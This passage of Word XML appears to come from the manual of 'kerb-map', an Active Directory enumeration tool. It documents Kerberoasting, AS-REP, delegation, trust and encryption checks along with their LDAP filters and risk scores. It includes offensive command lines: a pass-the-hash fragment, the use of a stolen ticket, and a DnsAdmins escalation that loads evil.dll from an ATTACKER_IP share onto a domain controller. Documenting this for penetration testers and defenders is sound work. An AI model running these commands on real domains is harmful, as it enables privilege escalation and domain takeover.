                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  -H 31d6cfe0d16ae931b73c59d7e0c089c0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="3_3_Kerberos_ccache___k_" w:id="22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Kerberos ccache (-k)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses a Kerberos ticket cache file. The KRB5CCNAME environment variable must be set to the path of a valid ccache file before running the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Obtain a ticket with impacket first</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">getTGT.py corp.local/jsmith:Password123</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Or steal a ticket and convert it</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">export KRB5CCNAME=/tmp/Administrator.ccache</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py -d corp.local -dc dc01.corp.local -u Administrator -k</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="4__Module_Reference" w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Module Reference</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kerb-map is built around independent modules that each perform a specific enumeration task. All modules share a single authenticated LDAP connection and perform only read-only queries unless noted otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="4_1_SPN_Scanner____spn_" w:id="24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 SPN Scanner (--spn)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The SPN scanner identifies every non-computer, non-disabled domain account that has a servicePrincipalName attribute set. These accounts are Kerberoastable: any authenticated domain user can request a Kerberos TGS ticket for them and attempt to crack the ticket offline without touching the account directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The scanner performs a single LDAP query using the filter below, then pulls sAMAccountName, servicePrincipalName, pwdLastSet, lastLogonTimestamp, msDS-SupportedEncryptionTypes, memberOf, userAccountControl, adminCount, and description for each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(&amp;(servicePrincipalName=*)(!(objectClass=computer))(!(cn=krbtgt))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">(!(userAccountControl:1.2.840.113556.1.4.803:=2)))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scoring Algorithm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Each Kerberoastable account receives a crack score from 0 to 100 based on these weighted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000"/>
        <w:gridCol w:w="436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Factor</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Condition</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Points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Why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Encryption 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RC4 allowed (enc=0 or bit 2 set)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+40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RC4 hashes crack ~10x faster than AES in hashcat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Encryption type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AES only, enc type unknown</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+20</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Slower but still crackable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Password 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Never set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+15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Likely default or forgotten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Password age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Older than 2 years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+25</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 chance of weak/guessable password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Password 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Older than 1 year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+15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Increased likelihood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Admin membership</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adminCount=1 or in admin group</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+20</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Cracking gives immediate privilege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Service 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MSSQLSvc, WSMAN, exchangeMDB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+15–35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High-value service accounts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Logon history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Never logged in</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+10</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May be unmaintained service account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Results are sorted by crack score descending. The highest-priority targets are displayed first in the Priority Targets table with the exact GetUserSPNs.py command pre-filled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="4_2_AS_REP_Scanner____asrep_" w:id="25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 AS-REP Scanner (--asrep)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Finds all enabled domain accounts with the DONT_REQ_PREAUTH flag set in userAccountControl. These accounts do not require Kerberos pre-authentication, meaning any unauthenticated attacker can request an AS-REP blob for them and crack it offline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LDAP Filter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(&amp;(userAccountControl:1.2.840.113556.1.4.803:=4194304)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">(!(userAccountControl:1.2.840.113556.1.4.803:=2)))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">AS-REP Roastable accounts receive a flat priority score of 75. Accounts that are also members of admin groups receive a score of 90, since cracking the hash yields immediate elevated access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="4_3_Delegation_Mapper____delegation_" w:id="26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Delegation Mapper (--delegation)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Maps all three Kerberos delegation types across the domain. Delegation misconfigurations are among the most commonly exploitable findings in mature AD environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:bookmarkStart w:name="4_3_1_Unconstrained_Delegation" w:id="27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.1 Unconstrained Delegation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Any account or computer with the TRUSTED_FOR_DELEGATION flag (bit 0x80000 in userAccountControl) caches the TGT of every user who authenticates to it. If an attacker compromises such a host, they can extract all cached TGTs and use them to impersonate those users anywhere in the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(&amp;(userAccountControl:1.2.840.113556.1.4.803:=524288)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">(!(primaryGroupID=516))(!(primaryGroupID=521)))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk: CRITICAL. This is the most powerful delegation type. The typical attack pairs this with printerbug or PetitPotam to coerce the DC to authenticate to the compromised host, then extracts the DC’s TGT for a DCSync.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:bookmarkStart w:name="4_3_2_Constrained_Delegation" w:id="28"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.2 Constrained Delegation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Accounts with the msDS-AllowedToDelegateTo attribute can only delegate to a specific list of SPNs. The scanner additionally checks for the TRUSTED_TO_AUTH_FOR_DELEGATION flag (Protocol Transition / S4U2Self), which allows the account to request a Service Ticket on behalf of any user without that user actually authenticating first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk: HIGH if protocol transition is enabled, MEDIUM otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:bookmarkStart w:name="4_3_3_Resource_Based_Constrained_Delegation__RBCD_" w:id="29"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.3 Resource-Based Constrained Delegation (RBCD)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RBCD is configured on the target object itself via the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. If an attacker has GenericWrite or WriteDACL over a computer object, they can write this attribute, add a machine account they control, and obtain a Service Ticket impersonating any domain user to that computer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="4_4_User_Enumerator____users_" w:id="30"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 User Enumerator (--users)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Performs broad passive enumeration of users, policies, and domain configuration. All queries are read-only LDAP. Findings feed directly into the scorer to identify password spray opportunities, trust abuse paths, and DnsAdmins escalation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9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Check</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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Privileged users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adminCount=1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Includes shadow admins — adminCount never auto-removes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Stale accounts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lastLogonTimestamp threshold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MEDIUM</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Accounts inactive for 90+ days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Password policy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domainDNS attributes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VARIES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Flags no lockout, weak length, reversible encryption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Domain trusts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trustedDomain objectClass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Flags SID filtering disabled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DnsAdmins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Group membership query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DLL injection into DNS service = SYSTEM on DC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LAPS status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ms-Mcs-AdmPwd presence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 LAPS = shared local admin password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GPO links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groupPolicyContainer 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INFO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Useful for manual review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DnsAdmins — Why It Matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Members of the DnsAdmins group can use dnscmd to configure the DNS service to load an arbitrary DLL from a UNC path. Since the DNS service runs as SYSTEM on Domain Controllers, this is a trivial privilege escalation from DnsAdmins to SYSTEM on any DC.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dnscmd &lt;DC_NAME&gt; /config /serverlevelplugindll \\&lt;ATTACKER_IP&gt;\share\evil.dll</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sc.exe \\&lt;DC_NAME&gt; stop dns</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sc.exe \\&lt;DC_NAME&gt; start dns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="4_5_Encryption_Auditor____encryption_" w:id="31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Encryption Auditor (--encryption)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Queries msDS-SupportedEncryptionTypes on all user and computer accounts. This is a v1.1 addition that identifies the accounts most vulnerable to offline cracking by checking which Kerberos encryption types they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60"/>
        <w:gridCol w:w="500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Check</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Severity</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Why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RC4-only accounts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RC4_HMAC_MD5 (etype 23) cracks at billions of attempts/sec on consumer GPUs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DES accounts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CRITICAL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DES-CBC was broken decades ago — any hash is trivially recoverable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Weak DCs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 DC advertising RC4/DES means every ticket issued may use weak encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RC4-only accounts and weak DCs score 65. DES accounts score 60. These sit in the upper-mid range of the priority engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="4_6_Trust_Mapper____trusts_" w:id="32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6 Trust Mapper (--trusts)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Discovers all Active Directory trust relationships via (objectClass=trustedDomain) and assesses risk based on type, direction, and SID filtering status. This is a v1.1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Condition</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Severity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Attack Path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Forest trust + no SID filtering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CRITICAL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SID history injection from trusted forest — cross-forest compromise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Bidirectional + no SID filtering</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Lateral movement in both directions without SID constraints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Bidirectional trust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MEDIUM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Standard two-way auth — users from either domain can authenticate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RC4 trust encryption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Inter-realm TGTs use weak encryption — offline crackable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="5__CVE_Detection_Modules____cves_" w:id="33"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. CVE Detection Modules (--cves)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The CVE scanner runs a set of checks against known critical vulnerabilities and AD misconfigurations. Checks are divided into safe (LDAP-only, no event log noise) and aggressive (RPC probes that generate Windows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Module</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CVE / Finding</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1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Aggressive?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nopac.py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CVE-2021-42278/42287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LDAP — MachineAccountQuota + schema version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adcs.py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ESC1, ESC2, ESC3, ESC4, ESC8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 certificate template attributes</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zerologon.py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CVE-2020-1472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Netlogon RPC probe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printnightmare.py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CVE-2021-1675 / CVE-2021-34527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RPC bind to \\pipe\\spoolss</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Yes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petitpotam.py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CVE-2021-36942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RPC bind to LSARPC / EFSRPC</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ms14_068.py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CVE-2014-6324 (PAC Forgery)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 domain functional level</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gpp_passwords.py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MS14-025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SMB — SYSVOL XML files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bronze_bit.py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CVE-2020-17049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 delegation + DC patch level</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certifried.py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CVE-2022-26923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LDAP — certificate template enrollment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ldap_signing.py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Signing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 rootDSE policies</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bl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="5_1_noPac___CVE_2021_42278___CVE_2021_42287" w:id="34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 noPac — CVE-2021-42278 / CVE-2021-42287</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Checks whether the domain is vulnerable to sAMAccountName spoofing. The attack requires two conditions: ms-DS-MachineAccountQuota greater than 0 (any domain user can create machine accounts), and the domain has not applied the November 2021 patches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
